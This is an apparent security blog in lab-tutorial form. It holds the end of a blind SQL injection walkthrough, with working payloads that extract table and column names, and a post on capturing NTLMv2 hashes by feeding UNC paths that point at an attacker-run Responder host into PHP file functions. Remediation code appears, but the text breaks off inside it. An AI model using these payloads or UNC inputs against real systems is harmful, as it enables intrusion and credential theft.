<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPocxSFleErqfvTYIvnXFVaOG75l4ld4W1j2UPzujFQ07ABSi7TVJ6q9T6cxAnG4AZ7n0spm_qqGS9vWsWdflFcnov-wRTlC2xfU5REGXf8xa7XTr-4OlmuO6zbbFcTV1UXibqbtlCV5E/s1600/12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPocxSFleErqfvTYIvnXFVaOG75l4ld4W1j2UPzujFQ07ABSi7TVJ6q9T6cxAnG4AZ7n0spm_qqGS9vWsWdflFcnov-wRTlC2xfU5REGXf8xa7XTr-4OlmuO6zbbFcTV1UXibqbtlCV5E/s1600/12.png" /></a></div>
<br />
Now the web application page shows the first character of the table name in ASCII representation. Here the web application shows "101", which is the ASCII representation of the letter "e".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYfP3DTE06lLq62XX7Ysnu2t1Gw2wqOzdjQj4l_RDvO14cHqgcQ6fiGUrkPGzblAtqLG8ljpHG9ja3bqOJLfeQAgFoRgWC4GOiQCSAeZ4KjeeCC6HwF6TBQMxbiZ6V0V-sNSqcF5sEqE/s1600/13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="80" data-original-width="1121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYfP3DTE06lLq62XX7Ysnu2t1Gw2wqOzdjQj4l_RDvO14cHqgcQ6fiGUrkPGzblAtqLG8ljpHG9ja3bqOJLfeQAgFoRgWC4GOiQCSAeZ4KjeeCC6HwF6TBQMxbiZ6V0V-sNSqcF5sEqE/s1600/13.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Increment the second parameter value of the "substring" function to extract the second character of the table name:<br />
<br />
<textarea cols="20" rows="1" style="height: 20px; width: 1014px;"> 0'+ ascii(substring( (select table_name from information_schema.tables where table_schema=database() limit 0,1) ,2,1))+ '0 </textarea>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMvALHND6TuNohg2hrGNq5Yt0UdfffG8QJ_F5vauxXt0uQ1hHauKjxsTDUXBq9jAN3EoRv5GiAYkgMg1Cyi0Bhae2PHN30LSocETH7GFWpTwJMH6gSwb0Vhl89SzsEIdWOLB72xH4mWnY/s1600/14.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1072" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMvALHND6TuNohg2hrGNq5Yt0UdfffG8QJ_F5vauxXt0uQ1hHauKjxsTDUXBq9jAN3EoRv5GiAYkgMg1Cyi0Bhae2PHN30LSocETH7GFWpTwJMH6gSwb0Vhl89SzsEIdWOLB72xH4mWnY/s1600/14.png" /></a></div>
<br />
The web application shows that the second character of the table name is "120", which is the ASCII representation of the letter "x". <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHVwugUotTKRl4uNAahz4w3xGK-SiM7XfPT55hQqcyLc6Bqi5KiygKEEms6_IjktpfKtHvDgK5BhSk1e4rx3ZU5iFDNh_kRy6CiZT8pTvSJ-qf6HMtJf9si5uiGc0Z33nOuaikklsSM/s1600/15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="128" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHVwugUotTKRl4uNAahz4w3xGK-SiM7XfPT55hQqcyLc6Bqi5KiygKEEms6_IjktpfKtHvDgK5BhSk1e4rx3ZU5iFDNh_kRy6CiZT8pTvSJ-qf6HMtJf9si5uiGc0Z33nOuaikklsSM/s1600/15.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
And to extract the rest of the characters of the table name, the user just needs
to keep incrementing the value of the second parameter of substring(). <br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">5. Extracting the column name for specific table in current database:</span></span></h2>
In the current database we have the table "exploit_list", in which the first column is "ID". During column name extraction from the table "exploit_list", this is the column which
will be extracted by our SQL injection payload.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTjwAGLUUrN-Low9_5uKZt6QypR4Gaonxox-Zcu4ov19_u1sKejkCU3MeHGnS9kI-E3pbDuLHJJjiKum-UyDE6dgjCPLRV7T9VzIkt-stFeJ3C0A99D5jEUKlarc6pAl-bVX77uYnZf3w/s1600/16.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="192" data-original-width="1444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTjwAGLUUrN-Low9_5uKZt6QypR4Gaonxox-Zcu4ov19_u1sKejkCU3MeHGnS9kI-E3pbDuLHJJjiKum-UyDE6dgjCPLRV7T9VzIkt-stFeJ3C0A99D5jEUKlarc6pAl-bVX77uYnZf3w/s1600/16.png" /></a></div>
<br />
<div style="text-align: left;">
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">5.1 Payload to extract the first character of the first column in table "exploit_list": </span></span></h3>
The payload to extract the first character of the column name from the table "exploit_list" will be like this:</div>
<textarea cols="20" rows="1" style="height: 27px; width: 978px;"> 0'+ ascii(substring( (select column_name from information_schema.columns where table_name='exploit_list' limit 0,1) ,1,1))+ '0 </textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NkO6vo2oL51l7kN5I1-uXjKck_ODkYbuz8ggX92_nixIoRoioal1U-LulglkpnSRI3-jB44XbPOqUwt5gF_17pl5kdaB4SCth4BokTsJP4QUAMFcRVUL7XLe70tsdFfvOwOB5B8g5Ss/s1600/17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="1022" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NkO6vo2oL51l7kN5I1-uXjKck_ODkYbuz8ggX92_nixIoRoioal1U-LulglkpnSRI3-jB44XbPOqUwt5gF_17pl5kdaB4SCth4BokTsJP4QUAMFcRVUL7XLe70tsdFfvOwOB5B8g5Ss/s1600/17.png" /></a></div>
<br />
The SQL injection payload executed successfully and the web application shows the output, which is "73" (the ASCII representation of the letter "I"). <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-0ZBSySJExl39EWZEM77QqmulIgI15rtoa2fQXprxv-etosOJYLpmJDy-90eX4ODh9-eEUxVlyygph7PYysbCWNgtPYBFr6-xyeCn53mez3MTR9qOZexB_9-iNWF-fY8N1aybDMYSpE/s1600/18.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="73" data-original-width="1213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-0ZBSySJExl39EWZEM77QqmulIgI15rtoa2fQXprxv-etosOJYLpmJDy-90eX4ODh9-eEUxVlyygph7PYysbCWNgtPYBFr6-xyeCn53mez3MTR9qOZexB_9-iNWF-fY8N1aybDMYSpE/s1600/18.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
To extract the rest of the characters of the column name, the user just needs to keep incrementing the value of the second parameter of substring(). </div>
<h2 style="text-align: left;">
Conclusion:</h2>
<div style="text-align: left;">
SQL injection exploitation can be tricky, but there may still be a way to perform it. </div>
<h2 style="text-align: left;">
Remediation:</h2>
<div style="text-align: left;">
To prevent SQL Injection attacks, refer to the OWASP guide:</div>
<div style="text-align: left;">
<a href="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html">https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</a></div>
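As an added illustration (not code from the original post), here is the vulnerable pattern behind the payload above beside its fix: the row id is validated as an integer and bound as a typed parameter of a prepared UPDATE, so the database never parses user input as part of the WHERE clause. The table and column names and the connection details are assumed.

```php
<?php
// Added example, not the post's own code. Table "users" and columns
// "email"/"id" are assumed for illustration.

// VULNERABLE: the request value is spliced into the WHERE clause. An input
// like  0'+ascii(substring(...))+'0  is therefore evaluated by the database,
// and which row gets updated depends on the result: exactly the blind
// oracle the payload above relies on.
function update_email_vulnerable(PDO $db, string $id, string $email): int
{
    $sql = "UPDATE users SET email = '$email' WHERE id = '$id'";
    return (int) $db->exec($sql);
}

// HARDENED: reject anything that is not a well-formed positive integer, then
// send both values as bound parameters of a prepared statement. The SQL text
// is fixed at prepare time, so no input can extend the WHERE clause.
function update_email_safe(PDO $db, string $id, string $email): int
{
    $intId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($intId === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $db->prepare('UPDATE users SET email = :email WHERE id = :id');
    $stmt->bindValue(':id', $intId, PDO::PARAM_INT);
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->rowCount();
}

// Connection helper (placeholder DSN and credentials). Emulated prepares are
// switched off so the statement and its parameters really travel to the
// server separately (pdo_mysql emulates them by default).
function connect_db(): PDO
{
    return new PDO('pgsql:host=DB_HOST;dbname=DB_NAME', 'DB_USER', 'DB_PASSWORD', [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}
```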
<br />
Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br /></div>
</div>
Mannu Linux (http://www.blogger.com/profile/00618753918803236379), published 2020-03-08, updated 2023-11-23: Abusing File System functions in web applications - steal NTLMv2 hash<div dir="ltr" style="text-align: left;" trbidi="on">
In this blog post, we are going to explore a scenario in which a web application allows a user to perform file system operations on files and directories. An attacker can supply a UNC path as input to the vulnerable application, and the web server will then make a request to an attacker-controlled server. During that communication, the attacker-controlled server tricks the web server into leaking the NTLMv2 hash. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV7TsmCYitLgdoV8iix8j0Yjr66kCcD3kjEewYvPmY12gNqtb3jzmQaDsCjIcAui_tBhggUqogkf2jppoKew6Bwv-Q10yT-7gf42KP8w9bzhynr9SkxaFPDa9dSHEg-9nmE77Di70HDJQ/s1600/attack-scenario-resp-file-share.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="396" data-original-width="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV7TsmCYitLgdoV8iix8j0Yjr66kCcD3kjEewYvPmY12gNqtb3jzmQaDsCjIcAui_tBhggUqogkf2jppoKew6Bwv-Q10yT-7gf42KP8w9bzhynr9SkxaFPDa9dSHEg-9nmE77Di70HDJQ/s1600/attack-scenario-resp-file-share.png" /></a></div>
<div style="text-align: center;">
Pic credit goes to <a href="https://twitter.com/ka3hk" target="_blank">Ashwath Sir</a></div>
<br />
<span style="color: orange;"><b>Description:</b></span><br />
Programming languages provide various functions that let a user perform file system operations.<br />
<br />
Each language has a specific function for each piece of functionality. <br />
Let's consider the case of PHP (<a href="https://www.php.net/manual/en/ref.filesystem.php" target="_blank">here is the full reference to the file system functions available in PHP</a>)<br />
<br />
File related operations<br />
<textarea cols="30" rows="6" style="height: 130px; margin: 0px; width: 300px;">Operation        Function
---------------------------
Read file        readfile()
Write file       fwrite()
Edit file        fopen()
Delete file      unlink()
Copy file        copy()
</textarea>
<br />
<br />
<br />
Directory related operations<br />
<textarea cols="30" rows="6" style="height: 110px; margin: 0px; width: 300px;">Operation           Function
-------------------------------
Create directory    mkdir()
Rename directory    rename()
Change directory    chdir()
Delete directory    rmdir()
</textarea>
<br />
<br />
File system functions allow a user to perform operations not just on local files and directories but on a remote file system as well (for example, an SMB server).<br />
To access a remote SMB server, the file system function takes a UNC path as input and parses it (on a Windows-based machine). <br />
<br />
<span style="color: orange;"><b>Environment Set-up: - </b></span><br />
My demo environment had the following configured in place to exploit the issue:<br />
<span style="background-color: black;"><span style="color: yellow;"><br /> Windows Server 2012 box (IP - 192.168.56.2)<br /> Windows 7 AD Client box (IP - 192.168.56.101)<br /> Backbox Linux box (IP - 192.168.56.106)</span></span><br />
<br />
Windows Server 2012 box: -<br />
This is the Active Directory Domain Controller machine.<br />
<br />
Windows 7 AD Client box: -<br />
This machine has Windows 7 installed and is part of the Windows Active Directory domain. The web application is hosted on this machine, and the web server runs with the privileges of one of the Active Directory domain users (user box).<br />
<br />
Backbox Linux box: -<br />
This is the attacker machine, on which the "Responder" tool is listening on port 445 for SMB (File Server Service) requests.<br />
<br />
<br />
<span style="color: orange;"><b>Exploitation scenario:</b></span><br />
Let's suppose the vulnerable web application server satisfies the conditions below, which are required for exploitation:<br />
1. SMB outbound firewall rule: outgoing traffic on SMB port 445 must be allowed from the Windows machine on which the web application is hosted<br />
2. When the user-supplied data is passed to the file system function, no other string is prepended to it. <br />
<br />
In order to exploit the issue, the attacker needs to set up the "Responder" tool on a remote server.<br />
The Windows machine can make an SMB request to the attacker-controlled server, and Responder will ask the Windows machine to perform challenge-response based authentication.<br />
In this process, Responder steals the NTLMv2 hash from the client Windows machine.<br />
<br />
<span style="color: orange;"><b>Vulnerable code and web server environment:</b></span><br />
The vulnerable web application code has an interface to perform various file system operations:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c-uiDgwNc1_vXy3VMmdVekToTSjHy8PP7Ctx_ATVZQ1bFFUVTKGQlHucYmJUNl2qzeW473-c6mji-2BPIGUfY7tGbGr-6MjShOhQ2Np6GlRn-Z4ehjXI8aMCwXiUItxn8uju5aPHTbs/s1600/fs.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="868" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c-uiDgwNc1_vXy3VMmdVekToTSjHy8PP7Ctx_ATVZQ1bFFUVTKGQlHucYmJUNl2qzeW473-c6mji-2BPIGUfY7tGbGr-6MjShOhQ2Np6GlRn-Z4ehjXI8aMCwXiUItxn8uju5aPHTbs/s1600/fs.png" /></a></div>
<br />
<br />
The vulnerable code is hosted on a machine with "Windows 7" installed; the IP of the machine is "192.168.56.101". This machine is part of the Windows Active Directory domain "lab.indishell.lab".<br />
<br />
<br />
<span style="color: orange;"><b>Exploiting directory-related file system functions:</b></span><br />
Let's start with the functions that perform operations on directories. In the vulnerable code, we have multiple such functions.<br />
<span style="color: orange;"><u><b>Create Directory</b> - mkdir()</u></span><br />
The PHP function <a href="https://www.php.net/manual/en/function.mkdir.php" target="_blank">mkdir()</a> expects 2 arguments:<br />
1. the name of the directory<br />
2. the permissions to set on the directory<br />
<br />
In my case, Responder is listening on <span style="color: yellow;">IP 192.168.56.106</span>, which needs to be specified in the input box like this: "\\192.168.56.106\b0x". This input instructs mkdir() to create a directory named "b0x" on the remote file share at IP 192.168.56.106 (where Responder is listening on SMB port 445).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlC9CAEdasHk4GsK6u6A1qyYLazQDkIozjVoNEuJbPHx-K_mAvdJ86kB1K7JMJD4Dl2TM_lZTwhJ0wUVDQmbfUzpwpzZ-SSn0-bPwmdMcUCqrwZvgN-PTff2HlzEjg47WPx5tLzHrQh3U/s1600/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlC9CAEdasHk4GsK6u6A1qyYLazQDkIozjVoNEuJbPHx-K_mAvdJ86kB1K7JMJD4Dl2TM_lZTwhJ0wUVDQmbfUzpwpzZ-SSn0-bPwmdMcUCqrwZvgN-PTff2HlzEjg47WPx5tLzHrQh3U/s1600/1.png" /></a></div>
<br />
<br />
The moment "Create directory" was clicked, mkdir() parsed the UNC path and tried to create the directory "b0x" on the machine where Responder is listening.<br />
As always, Responder asked the Windows machine to complete challenge-response authentication, and the Windows machine passed the NTLMv2 hash to Responder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ1Lq6gL5QNT1x-NrHbY70P62IdUN_fD6u5mlTf0BliCszgg9cMNH6S6r6DaIiz2tfHPC_nJ_PflErvHu4PMo08z_nvBxZ_-hhx3JJhng6uci0BMgkOwD9X399342rr4q0TodOleYZc1k/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="883" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ1Lq6gL5QNT1x-NrHbY70P62IdUN_fD6u5mlTf0BliCszgg9cMNH6S6r6DaIiz2tfHPC_nJ_PflErvHu4PMo08z_nvBxZ_-hhx3JJhng6uci0BMgkOwD9X399342rr4q0TodOleYZc1k/s1600/3.png" /></a></div>
<br />
<span style="color: orange;"><u><b>Delete directory:</b> rmdir()</u></span><br />
The PHP <a href="https://www.php.net/manual/en/function.rmdir.php" target="_blank">rmdir()</a> function expects 1 argument from the user: the path of the directory to delete.<br />
<br />
In the input box, specify the UNC path to the machine where Responder is listening, like this: "\\192.168.56.106\b0x".<br />
This path instructs rmdir() to delete the directory named "b0x" on the remote file system at IP 192.168.56.106.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcbEJYMkMOcYTY8dDaeonaMjqBtFYQN4GipvtoHuw3uXNfKtHyNJXZEFSjOuU74gRW5dcKKjun1gTsnazoYndJI-Zg_YIfB9YYVTahpYrVVfjStzriBIESsJh6CG3L4dB7LnTJQa7GgI/s1600/delete+directory.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="793" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcbEJYMkMOcYTY8dDaeonaMjqBtFYQN4GipvtoHuw3uXNfKtHyNJXZEFSjOuU74gRW5dcKKjun1gTsnazoYndJI-Zg_YIfB9YYVTahpYrVVfjStzriBIESsJh6CG3L4dB7LnTJQa7GgI/s1600/delete+directory.png" /></a></div>
<br />
Upon clicking the "Delete Directory" button, the rmdir() function tried to access the directory "b0x" located on IP 192.168.56.106 (the machine where Responder is listening).<br />
Responder tricked the Windows machine into passing the NTLMv2 hash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCcW4a5VvXVdjcqz7_VdCIMYr5QRkMI481eQHrJoG6dKqJom51hdKyAjXwvSvp60Un-w1wnHIArSbhM9JGRm6Wol9WCY3ICezoo8jh_uerTdD5exWijBhcMp7jTQgIrGtODsOs5GFjis/s1600/delete+directory+2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="850" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCcW4a5VvXVdjcqz7_VdCIMYr5QRkMI481eQHrJoG6dKqJom51hdKyAjXwvSvp60Un-w1wnHIArSbhM9JGRm6Wol9WCY3ICezoo8jh_uerTdD5exWijBhcMp7jTQgIrGtODsOs5GFjis/s1600/delete+directory+2.png" /></a></div>
<br />
<span style="color: orange;"><u><b>List directory:</b></u></span> <br />
PHP's directory listing functions also process the UNC path, so Responder can steal the NTLMv2 hash from the web application server in the same way.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF8EHuDBXIH6GjE9IuroTrIjtLe8ZrFvUcxsCbnx1j2gobiCp21z6ysdzzpLM6yXbF_1ibgIg5gfW_Gxn9pNgjK5AP2t8Qne4VDoBtwHA-PeqjTqHkfzU2Ak0pux60VR_922phCP3iuE4/s1600/list2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="707" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF8EHuDBXIH6GjE9IuroTrIjtLe8ZrFvUcxsCbnx1j2gobiCp21z6ysdzzpLM6yXbF_1ibgIg5gfW_Gxn9pNgjK5AP2t8Qne4VDoBtwHA-PeqjTqHkfzU2Ak0pux60VR_922phCP3iuE4/s1600/list2.png" /></a></div>
<br />
<br />
<span style="color: orange;"><b>Exploiting file-related file system functions:</b></span><br />
In the vulnerable code, we have multiple file operation functions. Let's try them.<br />
<span style="color: orange;"><u><b>Delete File</b> - unlink()</u></span><br />
The PHP function <a href="https://www.php.net/manual/en/function.unlink.php" target="_blank">unlink()</a> deletes the specified file and expects 1 argument: the path to the file.<br />
<br />
Responder is listening on <span style="color: yellow;">IP 192.168.56.106</span>, which needs to be specified in the input box like this: "\\192.168.56.106\b0x.txt". This input instructs unlink() to delete the file named "b0x.txt" on the remote file share at IP 192.168.56.106 (where Responder is listening on SMB port 445).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjccR2xmgZk8oAfIbnlvfCSOtE-PyXNI04lx_CVnaWLR_VoroUeuDfnovkEew6ARh3ffDMKlG8KaJzQl_dWOcKO6vnhTT_7dHUsJLUUAbMS2S_WVrVFBSwaE7OUjUEhefO5dpSV6tBhHzk/s1600/file_del.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="830" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjccR2xmgZk8oAfIbnlvfCSOtE-PyXNI04lx_CVnaWLR_VoroUeuDfnovkEew6ARh3ffDMKlG8KaJzQl_dWOcKO6vnhTT_7dHUsJLUUAbMS2S_WVrVFBSwaE7OUjUEhefO5dpSV6tBhHzk/s1600/file_del.png" /></a></div>
<br />
The moment the "Delete File" button was clicked, the unlink() function tried to access the remote file system hosted on IP 192.168.56.106, and Responder stole the NTLMv2 hash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GyMKasUUZgrIqC1gCOTErguHEMgMciOGo6PmBDE-Fjw72gCfLWv-G4oofmj2xdu-QpwhvznCzySOejrI3w8Ka6FvCVRO0Yg-UnQbw5TyylxhQV909zaUC1TEfuX_HLiyQKftqhy38Gc/s1600/file_del2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="741" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GyMKasUUZgrIqC1gCOTErguHEMgMciOGo6PmBDE-Fjw72gCfLWv-G4oofmj2xdu-QpwhvznCzySOejrI3w8Ka6FvCVRO0Yg-UnQbw5TyylxhQV909zaUC1TEfuX_HLiyQKftqhy38Gc/s1600/file_del2.png" /></a></div>
<br />
<span style="color: orange;"><u><b>Copy File</b> - copy()</u></span><br />
The PHP function <a href="https://www.php.net/manual/en/function.copy.php" target="_blank">copy()</a> copies a file from the specified source to the specified destination.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFcCSlcv1FFaQSQ0jFa-b2ZbwRJIXYGjIpk0wqShpmaUMyg8Kc_qxBktY4NMyws8uCOvRCO9SKZqyLDe0AW_eDgBNPsDifm2mEw3up_75rT_MygeQGPhhZJbbHsCmnIo7LCsys4zZPVQ/s1600/copy+file.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFcCSlcv1FFaQSQ0jFa-b2ZbwRJIXYGjIpk0wqShpmaUMyg8Kc_qxBktY4NMyws8uCOvRCO9SKZqyLDe0AW_eDgBNPsDifm2mEw3up_75rT_MygeQGPhhZJbbHsCmnIo7LCsys4zZPVQ/s1600/copy+file.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
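The exploitation conditions listed earlier point to the two controls: block outbound SMB (port 445) from web servers at the network edge, and never hand user input to a file system function as a path. The wrapper below is an added example, not the post's own code: it confines every path given to mkdir()/rmdir()/unlink()/copy() to one local base directory and rejects UNC and stream-wrapper paths by string inspection before any file system call, because on Windows even realpath() or file_exists() on a UNC path would already open the SMB connection. The base directory is assumed.

```php
<?php
// Added example, not the post's own code. Base directory "C:\webapp\storage"
// is assumed; every file system function receives only what this wrapper returns.

final class UnsafePathException extends RuntimeException {}

function confine_to_base(string $base, string $userInput): string
{
    // 1. Reject remote and non-file targets by string inspection FIRST. On
    //    Windows, realpath()/file_exists()/is_dir() on "\\host\share" would
    //    already open the SMB connection and trigger NTLM authentication.
    //    Covers \\host\share, //host/share, the \\?\ and \\.\ prefixes, and
    //    PHP stream wrappers such as smb://, file://, php://.
    if (preg_match('#^[\\\\/]{2}#', $userInput)
        || preg_match('#^[a-z][a-z0-9+.-]*://#i', $userInput)) {
        throw new UnsafePathException('remote or wrapper path rejected');
    }
    // 2. Reject absolute paths and drive letters; only a relative name is valid.
    if (preg_match('#^([a-z]:|[\\\\/])#i', $userInput)) {
        throw new UnsafePathException('absolute path rejected');
    }
    // 3. Reject NUL bytes and ".." segments outright.
    if (strpos($userInput, "\0") !== false) {
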